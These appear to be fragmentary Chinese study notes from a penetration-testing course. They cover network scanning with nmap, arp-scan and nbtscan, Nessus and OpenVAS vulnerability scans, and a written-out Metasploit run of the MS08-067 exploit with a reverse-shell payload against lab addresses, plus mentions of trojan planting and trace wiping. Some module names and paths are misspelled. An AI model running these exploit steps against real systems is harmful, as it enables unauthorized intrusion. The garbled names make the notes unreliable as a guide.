meta

视频: 利用Backtrack渗透windows7
BT4
cd /peetest/exploilt/set
set 4
metasploit生成windows木马,渗透Windows系统

telnet网络查点
msf > use auxiliary/scanner/telnet

2.2.0网络扫描
主机
端口扫描
操作系统
漏洞

xprobe2 10.10
metaspolit
nmap
nessus

icmp ping
arping
arp-scan
nbtscan
metasploit
nmap
ping request报文禁止响应
-c
-s 报文的大小
arping 只能一次一个地址
桥接网卡
arping 10.1.1.47
终结者的arp欺骗
arp-scan --interface=eth2 10.10.10.0/24

主机名
nbtscan 10.1.1.0/24
nmap 10.1.1.29
有端口号 服务名称，找软件bug
nmap -sn 10.10.10.0/24 不加端口只有mac,IP信息

man ifconfig
dns禁用dns解析
msfconsole
v4.7
arp_sweep
use auxiliary/scanner/discovery/arp_sweep
show options
set rhosts 10.10.10.1-10.10.10.254
set threads 10
run //大小写敏感
加接口 接口IP 接口mac地址
只有ip信息
退出back退出子程序
其他扫描模块
nmap -sP 缺省执行。icmp/syn/ack/udp ping功能

2.2.1主机扫描
被攻击者
xprobe 10.10.10.129
nmap -O 10.10.10.254
owasp broken web apps
指纹
nmap 扫描范围不要被限制
如baidu.com 80 443
ctrl+c中止
2。1。2。3端口扫描（服务）
metasploit渗透测试指南
metasloit渗透测试魔鬼训练营
网络攻击技术与实践
攻击流程
软件
常见windows挖掘和攻击
liunx漏洞和攻击
mindmanager

攻击前网络踩点
网络扫描 网络查点
攻击中 渗透。获取权限
攻击后。维持攻击。文件拷贝木马植入。痕迹擦除
metaspolit
autoscan
nmap 
2.1.2.4漏洞扫描
nessus
介绍
安装
演示
外围信息搜索
主机探测与端口扫描

服务扫描与查点
网络漏洞扫描
openvas
计算机的内存不足 mind
liunx 安装
ms12-020 开启3389
建立策略
公网地址：home没有权限
红的
09-001
08-067
ms12-020-poc.final
msfconsole 不停的提示
我操
ping 10.1.1.84 
unreachable
msfconsole
use exploit/windows/ms08_068_netapi
show payloads
set payload generic/shell_reverse_tcp
show options
show targets
set rhost 10.10.10.130
set lhost 10.10.10.131
set lport 5000
set target 5
exploit
rexploit
不支持中文版
http://tieba.baidu.com/p/1681819009http://pan.baidu.com/s/1ntDJh7V


 search ms08_067
攻击载荷